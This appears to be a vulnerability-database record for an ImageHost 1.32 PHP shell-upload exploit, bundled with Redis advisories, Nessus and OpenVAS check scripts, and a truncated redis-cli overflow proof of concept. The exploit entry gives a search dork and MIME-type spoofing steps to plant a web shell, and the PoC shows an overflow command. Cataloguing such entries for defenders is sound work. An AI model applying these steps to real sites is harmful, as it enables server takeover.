ID 1337DAY-ID-12326 Type zdt Reporter RiskY Modified 2010-05-21T00:00:00
Description
Exploit for php platform in category web applications
=========================================
ImageHost 1.32 Shell Upload Vulnerability
=========================================
# Exploit Title: [ImageHost 1.32 Shell Upload ]
# Category: [ php script upload ]
# Date: [2010-05-20]
# Author: [R i sk Y]
# Contact: [email protected] , [email protected] (hotmail)
# Software Link: [not available]
# Version: [1.32]
# Tested on: [Windows XP SP 3 ]
# Dork: " ImageHost 1.32 (c) 2006 by Gentoo Tpax"
# Info: The exploiter uploads a PHP shell using the Tamper Data add-on (in Firefox) to change the
declared application/octet-stream type to image/gif, clicks submit, and the shell is uploaded successfully
(the upload check accepts the client-supplied MIME type instead of inspecting the file itself);
the script then gives the direct link to the uploaded PHP file.
GreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com
# 0day.today [2018-02-17] #
{"published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12326", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T03:43:41", "bulletin": {"published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12326", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-19T03:43:41"}}, "hash": "3741ec436852f0c9d677d15bf540f157fd4da3ee531732138f0061b768632ff8", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T03:43:41", "edition": 1, "title": "ImageHost 1.32 Shell Upload Vulnerability", "href": "http://0day.today/exploit/description/12326", "modified": "2010-05-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/12326", "references": [], "reporter": "RiskY", "sourceData": "=========================================\r\nImageHost 1.32 Shell Upload Vulnerability\r\n=========================================\r\n\r\n\r\n# Exploit Title: [ImageHost 1.32 Shell Upload ]\r\n\r\n# Category: [ php script upload ]\r\n\r\n# Date: [2010-05-20]\r\n\r\n# Author: [R i sk Y]\r\n\r\n# Contact: Risky.Hack@yahOO.com , rsk@null.net (hotmail)\r\n\r\n# Software Link: [not available]\r\n\r\n# Version: [1.32]\r\n\r\n# Tested on: [Windows XP SP 3 ]\r\n\r\n# Dork: \" ImageHost 1.32 (c) 2006 by Gentoo Tpax\"\r\n\r\n# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the\r\napplication/octet-stream to >> image/gif ... 
and click submit , and ur shell will b e uploaded sucessfully.\r\nand the script will give u the direct link to ur php file.\r\n\r\n \r\n\r\nGreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com \r\n\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b0c5e16e327ebbf753eb1c8722e955c5", "key": "reporter"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "modified"}, {"hash": "8ebb2551672b288c4630fffaefe06aaa", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "daacce0a0e72db98280b4b986e01093b", "key": "sourceData"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "7050d548438c25db0fd4ff0591e39928", "key": "href"}, {"hash": "26e0a15a2c830557be4dbbfbb29e2339", "key": "sourceHref"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "e76d1f04044614888edfbd37e02ae5482227d91d779388318ce0d0fa9de4e906", "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2018-02-18T01:30:45"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:0094", "RHSA-2019:0052"]}, {"type": "nessus", "idList": ["REDIS_4_0_10.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891396", "OPENVAS:1361412562310813439", "OPENVAS:1361412562310105952"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1396-1:3B04A"]}, {"type": "zdt", "idList": ["1337DAY-ID-30598"]}, {"type": "exploitdb", "idList": ["EDB-ID:44904"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148225"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6028", "SECURITYVULNS:DOC:12326"]}], 
"modified": "2018-02-18T01:30:45"}, "vulnersScore": 1.7}, "type": "zdt", "lastseen": "2018-02-18T01:30:45", "edition": 2, "title": "ImageHost 1.32 Shell Upload Vulnerability", "href": "https://0day.today/exploit/description/12326", "modified": "2010-05-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/12326", "references": [], "reporter": "RiskY", "sourceData": "=========================================\r\nImageHost 1.32 Shell Upload Vulnerability\r\n=========================================\r\n\r\n\r\n# Exploit Title: [ImageHost 1.32 Shell Upload ]\r\n\r\n# Category: [ php script upload ]\r\n\r\n# Date: [2010-05-20]\r\n\r\n# Author: [R i sk Y]\r\n\r\n# Contact: [email\u00a0protected] , [email\u00a0protected] (hotmail)\r\n\r\n# Software Link: [not available]\r\n\r\n# Version: [1.32]\r\n\r\n# Tested on: [Windows XP SP 3 ]\r\n\r\n# Dork: \" ImageHost 1.32 (c) 2006 by Gentoo Tpax\"\r\n\r\n# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the\r\napplication/octet-stream to >> image/gif ... 
and click submit , and ur shell will b e uploaded sucessfully.\r\nand the script will give u the direct link to ur php file.\r\n\r\n \r\n\r\nGreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com \r\n\r\n\r\n\n\n# 0day.today [2018-02-17] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b03a6276691182d3b43871602a899729", "key": "href"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "modified"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b0c5e16e327ebbf753eb1c8722e955c5", "key": "reporter"}, {"hash": "9d8b01653fc183fed6d3eda650c8958a", "key": "sourceData"}, {"hash": "7a84200b1f5b49fda14a7a5c9201d977", "key": "sourceHref"}, {"hash": "8ebb2551672b288c4630fffaefe06aaa", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"redhat": [{"lastseen": "2019-08-13T18:45:43", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap buffer overflow in HyperLogLog triggered by malicious client (CVE-2019-10192)\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: Code execution in redis-cli via crafted command line arguments (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-25T20:02:37", "published": "2019-07-25T19:55:00", "id": "RHSA-2019:1860", "href": "https://access.redhat.com/errata/RHSA-2019:1860", "type": "redhat", "title": "(RHSA-2019:1860) Important: rh-redis32-redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:27", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. 
You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: code execution via a crafted command line (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-01-16T22:35:11", "published": "2019-01-16T22:06:31", "id": "RHSA-2019:0094", "href": "https://access.redhat.com/errata/RHSA-2019:0094", "type": "redhat", "title": "(RHSA-2019:0094) Moderate: redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:27", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. 
You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: code execution via a crafted command line (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-01-16T21:52:35", "published": "2019-01-16T21:51:00", "id": "RHSA-2019:0052", "href": "https://access.redhat.com/errata/RHSA-2019:0052", "type": "redhat", "title": "(RHSA-2019:0052) Moderate: redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-03T12:12:35", "bulletinFamily": "scanner", "description": "The version of Redis installed on the remote host is affected by\nmultiple vulnerabilities and therefore requires a security update.", "modified": "2019-11-02T00:00:00", "id": "REDIS_4_0_10.NASL", "href": "https://www.tenable.com/plugins/nessus/117484", "published": "2018-09-14T00:00:00", "title": "Pivotal Software Redis LUA < 3.2.12 / 4.0.x < 4.0.10 / 5.0 < 5.0rc2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117484);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-12326\");\n\n script_name(english:\"Pivotal Software Redis LUA < 3.2.12 / 4.0.x < 4.0.10 / 5.0 < 5.0rc2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Pivotal Software Redis.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Redis requires a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Redis installed on the remote host is 
affected by\nmultiple vulnerabilities and therefore requires a security update.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://antirez.com/news/119\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Redis 3.2.12, 4.0.10 or 5.0-rc2 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11218\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:redis\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"redis_detect.nbin\");\n script_require_ports(\"Services/redis_server\", 6379);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\n\nappname = \"Redis Server\";\nport = get_service(svc:\"redis_server\", default:6379, exit_on_fail:TRUE);\nversion = get_kb_item_or_exit(\"redis/\" + port + \"/Version\");\n\nfix = NULL;\nif (version =~ \"^[1-3]\\.\") fix = \"3.2.12\";\nelse if (version =~ \"^4\\.0\") fix = \"4.0.10\";\nelse if (version =~ \"^4\\.9\") fix = \"4.9.102\";\n\nif (!isnull(fix) && ver_compare(ver:version, fix:fix) == -1)\n{\n report =\n '\\n Port : ' + port +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "scanner", "description": "It was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\ncorruption and integer overflow vulnerabilities. 
(#901495)\n\n * CVE-2018-12326: Buffer overflow in the ", "modified": "2019-03-18T00:00:00", "published": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310891396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891396", "title": "Debian LTS Advisory ([SECURITY] [DLA 1396-1] redis security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1396.nasl 14270 2019-03-18 14:24:29Z cfischer $\n#\n# Auto-generated from advisory DLA 1396-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891396\");\n script_version(\"$Revision: 14270 $\");\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-11219\", \"CVE-2018-12326\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1396-1] redis security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:24:29 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 00:00:00 +0200 (Tue, 10 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00003.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"redis on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these issues have been fixed in redis version\n2:2.8.17-1+deb8u6.\n\nWe recommend that you upgrade your redis packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\ncorruption and integer overflow 
vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the 'redis-cli' tool which could\nhave allowed an attacker to achieve code execution and/or escalate to\nhigher privileges via a crafted command line. (#902410)\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"redis-server\", ver:\"2:2.8.17-1+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"redis-tools\", ver:\"2:2.8.17-1+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "description": "This host is running Redis and is prone to\n buffer overflow vulnerability.", "modified": "2019-05-17T00:00:00", "published": "2018-06-18T00:00:00", "id": "OPENVAS:1361412562310813439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813439", "title": "Redis Buffer Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Redis Buffer Overflow Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:redis:redis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813439\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-12326\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-18 16:33:41 +0530 (Mon, 18 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Redis Buffer Overflow Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Redis and is prone to\n buffer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a buffer overflow\n error in redis-cli of Redis.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to achieve code execution and escalate to higher privileges via a crafted\n command line.\");\n\n script_tag(name:\"affected\", value:\"Redis versions before 4.0.10 and 5.x before\n 5.0 RC3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Redis version 4.0.10 or 5.0 RC3\n or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://gist.github.com/fakhrizulkifli/f831f40ec6cde4f744c552503d8698f0\");\n script_xref(name:\"URL\", value:\"https://github.com/antirez/redis/commit/9fdcc15962f9ff4baebe6fdd947816f43f730d50\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/5.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://redis.io\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"gb_redis_detect.nasl\");\n script_require_ports(\"Services/redis\", 6379);\n script_mandatory_keys(\"redis/installed\");\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE)) exit(0);\nversion = infos['version'];\n\nif(version_is_less(version:version, test_version: \"4.0.10\")){\n fix = \"4.0.10\";\n}\n\n##5.0 RC1 == 4.9.101, 5.0 RC2 == 4.9.102\nelse if((version == \"4.9.101\") || (version == \"4.9.102\")){\n fix = \"5.0 RC3\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:version, fixed_version: fix);\n security_message(port: port, data: report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "description": "Gogs (Go Git Service) is prone to multiple vulnerabilities.", "modified": "2018-11-13T00:00:00", "published": "2015-02-06T00:00:00", "id": "OPENVAS:1361412562310105952", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105952", "title": "Gogs Multiple Vulnerabilities", "type": "openvas", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_gogs_multiple_vuln.nasl 12326 2018-11-13 05:25:34Z ckuersteiner $\n#\n# Gogs Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:gogs:gogs';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105952\");\n script_version(\"$Revision: 12326 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-13 06:25:34 +0100 (Tue, 13 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-06 14:11:04 +0700 (Fri, 06 Feb 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2014-8681\", \"CVE-2014-8682\", \"CVE-2014-8683\");\n script_bugtraq_id(71188, 71187, 71186);\n\n script_name(\"Gogs Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n\n 
script_dependencies(\"gb_gogs_detect.nasl\");\n script_mandatory_keys(\"gogs/detected\");\n\n script_tag(name:\"summary\", value:\"Gogs (Go Git Service) is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The installed Gogs version is prone to the following vulnerabilities:\n\n CVE-2014-8681:\n SQL injection vulnerability in the GetIssues function in models/issue.go.\n\n CVE-2014-8682:\n Multiple SQL injection vulnerabilities in the q parameter of api/v1/repos/search, which is not properly handled in models/repo.go and in api/v1/users/search, which is not properly handled in models/user.go.\n\n CVE-2014-8683:\n Cross-site scripting (XSS) vulnerability in models/issue.go.\");\n\n script_tag(name:\"impact\", value:\"Unauthenicated attackers can exploit this vulnerabilities to perform\n an XSS attack or execute arbitrary SQL commands which may lead to a complete compromise of the database.\");\n\n script_tag(name:\"affected\", value:\"Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.8\");\n\n script_tag(name:\"solution\", value:\"Update to version 0.5.8 or later.\");\n\n script_xref(name:\"URL\", value:\"http://gogs.io/docs/intro/change_log.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/129116/Gogs-Label-Search-Blind-SQL-Injection.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/129118/Gogs-Markdown-Renderer-Cross-Site-Scripting.html\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, 
port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"0.5.8\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"0.5.8\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-09-27T10:36:14", "bulletinFamily": "unix", "description": "Package : redis\nVersion : 2:2.8.17-1+deb8u6\nCVE IDs : CVE-2018-11218, CVE-2018-11219, CVE-2018-12326\nDebian Bugs : #901495, #902410\n\nIt was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\n corruption and integer overflow vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the \"redis-cli\" tool which could\n have allowed an attacker to achieve code execution and/or escalate to\n higher privileges via a crafted command line. (#902410)\n\nFor Debian 8 \"Jessie\", these issues have been fixed in redis version\n2:2.8.17-1+deb8u6.\n\nWe recommend that you upgrade your redis packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. 
`'` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "modified": "2018-06-26T16:07:53", "published": "2018-06-26T16:07:53", "id": "DEBIAN:DLA-1396-1:3B04A", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201806/msg00003.html", "title": "[SECURITY] [DLA DLA-1396-1] redis security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-06-19T11:38:10", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2018-06-19T00:00:00", "published": "2018-06-19T00:00:00", "id": "1337DAY-ID-30598", "href": "https://0day.today/exploit/description/30598", "title": "Redis-cli < 5.0 - Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\r\n# Exploit Author: Fakhri Zulkifli\r\n# Vendor Homepage: https://redis.io/\r\n# Software Link: https://redis.io/download\r\n# Version: 5.0, 4.0, 3.2\r\n# Fixed on: 5.0, 4.0, 3.2\r\n# CVE : CVE-2018-12326\r\n \r\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\r\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\r\n \r\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\r\nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\r\n \r\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\r\n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\r\n#2 0x570159 in repl 
